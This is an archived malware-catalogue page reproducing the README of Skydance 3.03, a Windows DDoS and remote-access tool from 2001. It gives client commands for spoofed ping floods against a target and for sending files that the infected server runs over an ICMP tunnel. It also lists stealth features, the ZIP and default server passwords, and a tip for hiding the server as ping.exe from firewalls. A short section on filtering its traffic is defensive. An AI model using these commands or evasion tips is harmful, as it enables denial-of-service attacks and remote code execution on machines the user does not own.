Skydance 3.03
Released 23 years, 6 months ago. March 2001
Copyright © MegaSecurity
By Edrin
Informations
| From | Germany |
| Author | Edrin |
| Family | Skydance |
| Category | Remote Access |
| Version | Skydance 3.03 |
| Released Date | Mar 2001, 23 years, 6 months ago. |
| Language | Microsoft Visual C++ |
Author Information / Description
This is - Skydance 3.03 - by
[email protected]
!
This is README.TXT-Version 3
http://skd.box.sk
Disclaimer - Read This First:
Everything in this document is based on the results i got from developing skydance.
Skydance 3.03 is an EXAMPLE of a Distributed Denial of Service attack!
Use SKYDANCE 3.03 SOURCE, README AND BINARY ON YOUR OWN RISK, i will NEVER be
responsible for any HARM or harmfull things that happen because SKYDANCE
source was USED! That means I do NOT guarantee for any features and
security-thing and i do not guarantee that this program works properly!!!
Indeed i guarantee for nothing ;)
Use the binaries to test how a DDoS is used! Do not install the Skydance binary on
a system that you do not own because this is probably illgeal! Do not use Skydance and it�s
components to attack a server because this is illegal, too!
Use this source and binary only to learn about how to defend/protect against Windows DDoS!
Do not give a modify a binary and do not give it to another person!
Use SKYDANCE 3.03 SOURCE, README AND BINARY ON YOUR OWN RISK!
suggestions against SKD303DDoS: goto ---> 4. d)
#tested with win98 and win2k
------------------------------------------------------------------------------------------------------
password for binary files in ZIP: dontharm
if you compile it "as it is" without changes:
#######################################
#Note: for skd303s.exe <pass> = nerv #
#######################################
1. What is it?
2. client usage:
3. About source code:
4. How to filter SKD303DDoS pongs
5. ICMP "ability" of win32 winsock (Icmp�s you can recv)
6. Some words about DDoS servers that use Windows OS.
1. What is it?
Skydance 3.03 is a DDoS for win32 using RAW sockets.
source includes this features:
- communication with ICMP, including a simple std-windows-"abcd..." ping attack
- can not be found with netstat -a (ICMP:)
- can not be found with usual Port-Scanners (RAW:)
- on win2k-systems communication and attacks are spoofed (IP_HDRINCL:)
- server size can be packet to 17 K
- client-source can be ported to unix because it is done as console app.
- (ICMP tunnel) file(<65kb) can be sent within a spoofed ICMP packet, executes it after receive.
2. client usage:
Usage:
The Client will try to use a spoofed source address. You should test your
spoofing-ability first to ensure that you can not be revealed. The test
will fail on WinNT and Win9x/Me systems. It should not fail under Win2000.
<spoofed-IP> and <target> must be in style of xxx.xxx.xxx.xxx
By default it is 216.32.74.55 = www.yahoo.com
<pass> must be <= 4 letters!
- To test spoofing-ability:
skd303c spoofing
- Get Server Info (always unspoofed packets!):
skd303c <server> <pass> info
Sample: skd303c myknight.com diva info
- To attack with spoofed standart-windows-pings:
skd303c <server> <pass> kill <target> <time-in-minutes> <spoofed-IP>
Sample: skd303c myknight.com diva kill 166.166.166.166 10 12.34.56.78
<time-in-minutes> can be up to 1440
- To send and exectue a file with a spoofed standart-windows-pong:
skd303c <server> <pass> fsend <file-name> <new-filename> <spoofed-IP>
Sample: skd303c myknight.com diva fsend c:\myfile.exe myfile.exe 98.76.54.32
<file-name> SIZE can be up to 6540 byte, <new-filename> can have up to 39 letters
DO NOT HARM PEOPLE! HELP CHILDREN IN AFRICA!
greetings, Edrin
3. About source code:
why this source needed to be modified to abuse it:
first of all: it is not possibel to receive ICMP_ECHOREQUESTS
with winsock ( -> 5.) so I decided to use ICMP_ECHORESPONSE in my
source. Anyway this makes it much more easier for Firewalls
next thing: communication pong have std unix ping size...
but anyway i�m not sure. 84 byte in total? (IP header 20 + ICMP 64)
the std-windows pings are the only attack i added and this attack is
not very powerful and a simple firewall might be able to stop an attack
The size of this std windows ping is #define STANDART_PINGSIZE 60 (byte)
that means the data flood is not as big as it could be!
There are probably othere DoS that are much more effective. Anyway my win2k
550 MHz had 100% CPU usage in a 10 MBit local area net.
In addition to that it would be neccessary that the info function returns
the OS version to get sure that a server is "spoofable".
Another thing that can reaveal skydance: i didn�t crypt the
unsigned char cCommand; (the command in my message-struct)
so a sniffer would always see a k(kill), i(info) or f(file)
at position FULL_PACKET[35 ?]
For example someone could use the first password letter +/- xy for
a "crypted" command or maybe some real crypto in my opinion a crypto
is not realy necessary.
And there is no self installing code in my source!
4. How to filter SKD303DDoS pongs
As i already mentioned:
In communictaion pongs:
a) communictaion with unix 84-byte PONGS ! ICMP_ECHORESPONSE
b) 'k', 'i', 'f' at position FULL_PACKET[35] or ICMP_STRUCT[15] (IPheader = 20 byte)
c) an 'i' pong is UNSPOOFED! so TRACE-BACKE would possibel!
---->> d) block each suspicious "ok-ICMP" in ( -> 5.) I THINK THIS WOULD PROTECT BEST!!!
i have no more ideas, do you?
5. ICMP "ability" of win32 winsock (Icmp�s you can recv)
Blocking each "ok-ICMP" might block communictation of each win-ICMP-DDoS
I tested it in a few minutes, no warranty, proof it yourself!
0 Echo reply. ok
1 Reserved. ok
2 Reserved. ok
3 Destination unreachable. failed
4 Source quench. failed
5 Redirect. failed
6 Alternate Host Address. ok
7 ok
8 Echo request. failed (this "would" be nice to receive)
9 Router advertisement. ok
10 Router solicitation. ok
11 Time exceeded. failed
12 Parameter problem. failed
13 Timestamp request. failed
14 Timestamp reply. ok
15 Information request. ok
16 Information reply. ok
17 Address mask request. failed
18 Address mask reply. ok
19 Reserved (for security). ok
20 ok
- unknown
29 Reserved (for robustness experiment).ok
30 Traceroute. ok
31 Conversion error. ok
32 Mobile Host Redirect. ok
33 IPv6 Where-Are-You. ok
34 IPv6 I-Am-Here. ok
35 Mobile Registration Request. ok
36 Mobile Registration Reply. ok
37 Domain Name request. ok
38 Domain Name reply. ok
39 SKIP Algorithm Discovery Protocol. ok
40 Photuris, Security failures. ok
41 ok
- unknown
255 Reserved. ok
6. Some words about DDoS from Windows OS.
The new feature IP_HDRINCL that comes with win2k can make windows to a powerful
DDoS server because it enables IP-spoofing!
IP_HDRINCL in source:
--> setsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); <--
That means win2k-servers will become a base for DDoS that is equal to *nix servers.
Anyway most windows systems remain dial-in computers that have dynamic IP. That means
such a DDoS as SKD3.03 can not be used with it in a serious way. I think for such
Computers the most threatoning DDoS remain IRC-"bots"!
Firewalls that control each winsock access are quite good. They would probably detect
DDoS servers. Anyway: Maybe you can replace ping.exe with a DDoS and maybe firewall does not
detect a DDoS then...
Thx for reading,
[email protected]If you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.